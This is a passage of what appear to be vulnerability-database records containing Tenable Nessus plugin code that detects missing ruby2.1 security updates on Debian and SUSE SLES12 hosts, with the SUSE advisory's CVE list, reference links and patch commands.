Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libruby2.1\", reference:\"2.1.5-2+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby2.1\", reference:\"2.1.5-2+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby2.1-dev\", reference:\"2.1.5-2+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby2.1-doc\", reference:\"2.1.5-2+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby2.1-tcltk\", reference:\"2.1.5-2+deb8u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:06:53", "description": "This update for ruby2.1 fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2015-9096: Fixed an SMTP command injection via CRLFsequences in a RCPT TO or MAIL FROM command (bsc#1043983).\n\nCVE-2016-7798: Fixed an IV Reuse in GCM Mode (bsc#1055265).\n\nCVE-2017-0898: Fixed a buffer underrun vulnerability in Kernel.sprintf (bsc#1058755).\n\nCVE-2017-0899: Fixed an issue with malicious gem specifications, insufficient sanitation when printing gem specifications could have included terminal characters (bsc#1056286).\n\nCVE-2017-0900: Fixed an issue with malicious gem specifications, the query command could have led to a denial of service attack against clients (bsc#1056286).\n\nCVE-2017-0901: Fixed an issue with malicious gem specifications, potentially overwriting arbitrary files on the client system (bsc#1056286).\n\nCVE-2017-0902: Fixed an issue with malicious gem specifications, that could have enabled MITM attacks against clients (bsc#1056286).\n\nCVE-2017-0903: Fixed an unsafe object deserialization vulnerability (bsc#1062452).\n\nCVE-2017-9228: Fixed a heap out-of-bounds write in bitset_set_range() during regex compilation (bsc#1069607).\n\nCVE-2017-9229: Fixed an invalid pointer dereference in left_adjust_char_head() in oniguruma (bsc#1069632).\n\nCVE-2017-10784: Fixed an escape sequence injection vulnerability in the Basic authentication of WEBrick (bsc#1058754).\n\nCVE-2017-14033: Fixed a buffer underrun vulnerability in OpenSSL ASN1 decode (bsc#1058757).\n\nCVE-2017-14064: Fixed an arbitrary memory exposure during a JSON.generate call (bsc#1056782).\n\nCVE-2017-17405: Fixed a command injection vulnerability in Net::FTP (bsc#1073002).\n\nCVE-2017-17742: Fixed an HTTP response splitting issue in WEBrick (bsc#1087434).\n\nCVE-2017-17790: Fixed a command injection in lib/resolv.rb:lazy_initialize() (bsc#1078782).\n\nCVE-2018-6914: Fixed an unintentional file and directory creation with directory traversal in tempfile and tmpdir (bsc#1087441).\n\nCVE-2018-8777: Fixed a potential DoS caused by large requests in WEBrick (bsc#1087436).\n\nCVE-2018-8778: Fixed a buffer under-read in String#unpack (bsc#1087433).\n\nCVE-2018-8779: Fixed an unintentional socket creation by poisoned NUL byte in UNIXServer and UNIXSocket (bsc#1087440).\n\nCVE-2018-8780: Fixed an unintentional directory traversal by poisoned NUL byte in Dir (bsc#1087437).\n\nCVE-2018-16395: Fixed an issue with OpenSSL::X509::Name equality checking (bsc#1112530).\n\nCVE-2018-16396: Fixed an issue with tainted string handling, where the flag was not propagated in Array#pack and String#unpack with some directives (bsc#1112532).\n\nCVE-2018-1000073: Fixed a path traversal issue (bsc#1082007).\n\nCVE-2018-1000074: Fixed an unsafe object deserialization vulnerability in gem owner, allowing arbitrary code execution with specially crafted YAML (bsc#1082008).\n\nCVE-2018-1000075: Fixed an infinite loop vulnerability due to negative size in tar header causes Denial of Service (bsc#1082014).\n\nCVE-2018-1000076: Fixed an improper verification of signatures in tarballs (bsc#1082009).\n\nCVE-2018-1000077: Fixed an improper URL validation in the homepage attribute of ruby gems (bsc#1082010).\n\nCVE-2018-1000078: Fixed a XSS vulnerability in the homepage attribute when displayed via gem server (bsc#1082011).\n\nCVE-2018-1000079: Fixed a path traversal issue during gem installation allows to write to arbitrary filesystem locations (bsc#1082058).\n\nCVE-2019-8320: Fixed a directory traversal issue when decompressing tar files (bsc#1130627).\n\nCVE-2019-8321: Fixed an escape sequence injection vulnerability in verbose (bsc#1130623).\n\nCVE-2019-8322: Fixed an escape sequence injection vulnerability in gem owner (bsc#1130622).\n\nCVE-2019-8323: Fixed an escape sequence injection vulnerability in API response handling (bsc#1130620).\n\nCVE-2019-8324: Fixed an issue with malicious gems that may have led to arbitrary code execution (bsc#1130617).\n\nCVE-2019-8325: Fixed an escape sequence injection vulnerability in errors (bsc#1130611).\n\nCVE-2019-15845: Fixed a NUL injection vulnerability in File.fnmatch and File.fnmatch? (bsc#1152994).\n\nCVE-2019-16201: Fixed a regular expression denial of service vulnerability in WEBrick's digest access authentication (bsc#1152995).\n\nCVE-2019-16254: Fixed an HTTP response splitting vulnerability in WEBrick (bsc#1152992).\n\nCVE-2019-16255: Fixed a code injection vulnerability in Shell#[] and Shell#test (bsc#1152990).\n\nCVE-2020-10663: Fixed an unsafe object creation vulnerability in JSON (bsc#1171517).\n\nNon-security issue fixed :\n\nAdd conflicts to libruby to make sure ruby and ruby-stdlib are also updated when libruby is updated (bsc#1048072).\n\nAlso yast2-ruby-bindings on SLES 12 SP2 LTSS was updated to handle the updated ruby interpreter. (bsc#1172275)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-06-18T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : ruby2.1 (SUSE-SU-2020:1570-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-9096", "CVE-2016-2339", "CVE-2016-7798", "CVE-2017-0898", "CVE-2017-0899", "CVE-2017-0900", "CVE-2017-0901", "CVE-2017-0902", "CVE-2017-0903", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-17405", "CVE-2017-17742", "CVE-2017-17790", "CVE-2017-9228", "CVE-2017-9229", "CVE-2018-1000073", "CVE-2018-1000074", "CVE-2018-1000075", "CVE-2018-1000076", "CVE-2018-1000077", "CVE-2018-1000078", "CVE-2018-1000079", "CVE-2018-16395", "CVE-2018-16396", "CVE-2018-6914", "CVE-2018-8777", "CVE-2018-8778", "CVE-2018-8779", "CVE-2018-8780", "CVE-2019-15845", "CVE-2019-16201", "CVE-2019-16254", "CVE-2019-16255", "CVE-2019-8320", "CVE-2019-8321", "CVE-2019-8322", "CVE-2019-8323", "CVE-2019-8324", "CVE-2019-8325", "CVE-2020-10663"], "modified": "2022-05-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libruby2_1", "p-cpe:/a:novell:suse_linux:libruby2_1-2_1-debuginfo", "p-cpe:/a:novell:suse_linux:ruby2.1", "p-cpe:/a:novell:suse_linux:ruby2.1-debuginfo", "p-cpe:/a:novell:suse_linux:ruby2.1-debugsource", "p-cpe:/a:novell:suse_linux:ruby2.1-stdlib", "p-cpe:/a:novell:suse_linux:ruby2.1-stdlib-debuginfo", "p-cpe:/a:novell:suse_linux:yast2-ruby-bindings", "p-cpe:/a:novell:suse_linux:yast2-ruby-bindings-debuginfo", "p-cpe:/a:novell:suse_linux:yast2-ruby-bindings-debugsource", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2020-1570-1.NASL", "href": "https://www.tenable.com/plugins/nessus/137599", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:1570-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137599);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/13\");\n\n script_cve_id(\n \"CVE-2015-9096\",\n \"CVE-2016-2339\",\n \"CVE-2016-7798\",\n \"CVE-2017-0898\",\n \"CVE-2017-0899\",\n \"CVE-2017-0900\",\n \"CVE-2017-0901\",\n \"CVE-2017-0902\",\n \"CVE-2017-0903\",\n \"CVE-2017-9228\",\n \"CVE-2017-9229\",\n \"CVE-2017-10784\",\n \"CVE-2017-14033\",\n \"CVE-2017-14064\",\n \"CVE-2017-17405\",\n \"CVE-2017-17742\",\n \"CVE-2017-17790\",\n \"CVE-2018-6914\",\n \"CVE-2018-8777\",\n \"CVE-2018-8778\",\n \"CVE-2018-8779\",\n \"CVE-2018-8780\",\n \"CVE-2018-16395\",\n \"CVE-2018-16396\",\n \"CVE-2018-1000073\",\n \"CVE-2018-1000074\",\n \"CVE-2018-1000075\",\n \"CVE-2018-1000076\",\n \"CVE-2018-1000077\",\n \"CVE-2018-1000078\",\n \"CVE-2018-1000079\",\n \"CVE-2019-8320\",\n \"CVE-2019-8321\",\n \"CVE-2019-8322\",\n \"CVE-2019-8323\",\n \"CVE-2019-8324\",\n \"CVE-2019-8325\",\n \"CVE-2019-15845\",\n \"CVE-2019-16201\",\n \"CVE-2019-16254\",\n \"CVE-2019-16255\",\n \"CVE-2020-10663\"\n );\n\n script_name(english:\"SUSE SLES12 Security Update : ruby2.1 (SUSE-SU-2020:1570-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for ruby2.1 fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2015-9096: Fixed an SMTP command injection via CRLFsequences in a\nRCPT TO or MAIL FROM command (bsc#1043983).\n\nCVE-2016-7798: Fixed an IV Reuse in GCM Mode (bsc#1055265).\n\nCVE-2017-0898: Fixed a buffer underrun vulnerability in Kernel.sprintf\n(bsc#1058755).\n\nCVE-2017-0899: Fixed an issue with malicious gem specifications,\ninsufficient sanitation when printing gem specifications could have\nincluded terminal characters (bsc#1056286).\n\nCVE-2017-0900: Fixed an issue with malicious gem specifications, the\nquery command could have led to a denial of service attack against\nclients (bsc#1056286).\n\nCVE-2017-0901: Fixed an issue with malicious gem specifications,\npotentially overwriting arbitrary files on the client system\n(bsc#1056286).\n\nCVE-2017-0902: Fixed an issue with malicious gem specifications, that\ncould have enabled MITM attacks against clients (bsc#1056286).\n\nCVE-2017-0903: Fixed an unsafe object deserialization vulnerability\n(bsc#1062452).\n\nCVE-2017-9228: Fixed a heap out-of-bounds write in bitset_set_range()\nduring regex compilation (bsc#1069607).\n\nCVE-2017-9229: Fixed an invalid pointer dereference in\nleft_adjust_char_head() in oniguruma (bsc#1069632).\n\nCVE-2017-10784: Fixed an escape sequence injection vulnerability in\nthe Basic authentication of WEBrick (bsc#1058754).\n\nCVE-2017-14033: Fixed a buffer underrun vulnerability in OpenSSL ASN1\ndecode (bsc#1058757).\n\nCVE-2017-14064: Fixed an arbitrary memory exposure during a\nJSON.generate call (bsc#1056782).\n\nCVE-2017-17405: Fixed a command injection vulnerability in Net::FTP\n(bsc#1073002).\n\nCVE-2017-17742: Fixed an HTTP response splitting issue in WEBrick\n(bsc#1087434).\n\nCVE-2017-17790: Fixed a command injection in\nlib/resolv.rb:lazy_initialize() (bsc#1078782).\n\nCVE-2018-6914: Fixed an unintentional file and directory creation with\ndirectory traversal in tempfile and tmpdir (bsc#1087441).\n\nCVE-2018-8777: Fixed a potential DoS caused by large requests in\nWEBrick (bsc#1087436).\n\nCVE-2018-8778: Fixed a buffer under-read in String#unpack\n(bsc#1087433).\n\nCVE-2018-8779: Fixed an unintentional socket creation by poisoned NUL\nbyte in UNIXServer and UNIXSocket (bsc#1087440).\n\nCVE-2018-8780: Fixed an unintentional directory traversal by poisoned\nNUL byte in Dir (bsc#1087437).\n\nCVE-2018-16395: Fixed an issue with OpenSSL::X509::Name equality\nchecking (bsc#1112530).\n\nCVE-2018-16396: Fixed an issue with tainted string handling, where the\nflag was not propagated in Array#pack and String#unpack with some\ndirectives (bsc#1112532).\n\nCVE-2018-1000073: Fixed a path traversal issue (bsc#1082007).\n\nCVE-2018-1000074: Fixed an unsafe object deserialization vulnerability\nin gem owner, allowing arbitrary code execution with specially crafted\nYAML (bsc#1082008).\n\nCVE-2018-1000075: Fixed an infinite loop vulnerability due to negative\nsize in tar header causes Denial of Service (bsc#1082014).\n\nCVE-2018-1000076: Fixed an improper verification of signatures in\ntarballs (bsc#1082009).\n\nCVE-2018-1000077: Fixed an improper URL validation in the homepage\nattribute of ruby gems (bsc#1082010).\n\nCVE-2018-1000078: Fixed a XSS vulnerability in the homepage attribute\nwhen displayed via gem server (bsc#1082011).\n\nCVE-2018-1000079: Fixed a path traversal issue during gem installation\nallows to write to arbitrary filesystem locations (bsc#1082058).\n\nCVE-2019-8320: Fixed a directory traversal issue when decompressing\ntar files (bsc#1130627).\n\nCVE-2019-8321: Fixed an escape sequence injection vulnerability in\nverbose (bsc#1130623).\n\nCVE-2019-8322: Fixed an escape sequence injection vulnerability in gem\nowner (bsc#1130622).\n\nCVE-2019-8323: Fixed an escape sequence injection vulnerability in API\nresponse handling (bsc#1130620).\n\nCVE-2019-8324: Fixed an issue with malicious gems that may have led to\narbitrary code execution (bsc#1130617).\n\nCVE-2019-8325: Fixed an escape sequence injection vulnerability in\nerrors (bsc#1130611).\n\nCVE-2019-15845: Fixed a NUL injection vulnerability in File.fnmatch\nand File.fnmatch? (bsc#1152994).\n\nCVE-2019-16201: Fixed a regular expression denial of service\nvulnerability in WEBrick's digest access authentication (bsc#1152995).\n\nCVE-2019-16254: Fixed an HTTP response splitting vulnerability in\nWEBrick (bsc#1152992).\n\nCVE-2019-16255: Fixed a code injection vulnerability in Shell#[] and\nShell#test (bsc#1152990).\n\nCVE-2020-10663: Fixed an unsafe object creation vulnerability in JSON\n(bsc#1171517).\n\nNon-security issue fixed :\n\nAdd conflicts to libruby to make sure ruby and ruby-stdlib are also\nupdated when libruby is updated (bsc#1048072).\n\nAlso yast2-ruby-bindings on SLES 12 SP2 LTSS was updated to handle the\nupdated ruby interpreter. (bsc#1172275)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1043983\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048072\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055265\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056286\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056782\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058754\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058755\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058757\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1062452\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1069607\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1069632\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1073002\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1078782\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082007\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082008\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082009\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082010\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082011\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082014\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1082058\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1087433\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1087434\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1087436\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1087437\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1087440\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1087441\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1112530\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1112532\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1130611\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1130617\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1130620\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1130622\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1130623\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1130627\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1152990\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1152992\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1152994\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1152995\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1171517\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1172275\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-9096/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-2339/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-7798/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-0898/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-0899/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-0900/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-0901/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-0902/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-0903/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-10784/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-14033/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-14064/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-17405/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-17742/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-17790/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-9228/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2017-9229/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-1000073/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-1000074/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-1000075/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-1000076/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-1000077/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-1000078/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-1000079/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-16395/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-16396/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-6914/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-8777/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-8778/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-8779/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-8780/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-15845/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-16201/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-16254/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-16255/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-8320/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-8321/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-8322/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-8323/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-8324/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-8325/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-10663/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20201570-1/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1d525cde\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud Crowbar 8 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-Crowbar-8-2020-1570=1\n\nSUSE OpenStack Cloud 8 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-8-2020-1570=1\n\nSUSE OpenStack Cloud 7 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-7-2020-1570=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SDK-12-SP5-2020-1570=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP4 :\n\nzypper in -t patch SUSE-SLE-SDK-12-SP4-2020-1570=1\n\nSUSE Linux Enterprise Server for SAP 12-SP3 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP3-2020-1570=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP2-2020-1570=1\n\nSUSE Linux Enterprise Server 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP5-2020-1570=1\n\nSUSE Linux Enterprise Server 12-SP4 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP4-2020-1570=1\n\nSUSE Linux Enterprise Server 12-SP3-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP3-2020-1570=1\n\nSUSE Linux Enterprise Server 12-SP3-BCL :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP3-BCL-2020-1570=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP2-2020-1570=1\n\nSUSE Linux Enterprise Server 12-SP2-BCL :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2020-1570=1\n\nSUSE Enterprise Storage 5 :\n\nzypper in -t patch SUSE-Storage-5-2020-1570=1\n\nHPE Helion Openstack 8 :\n\nzypper in -t patch HPE-Helion-OpenStack-8-2020-1570=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-17405\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2018-16395\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libruby2_1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libruby2_1-2_1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ruby2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ruby2.1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ruby2.1-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ruby2.1-stdlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ruby2.1-stdlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:yast2-ruby-bindings\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:yast2-ruby-bindings-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:yast2-ruby-bindings-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2|3|4|5)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3/4/5\", os_ver + \" SP\" 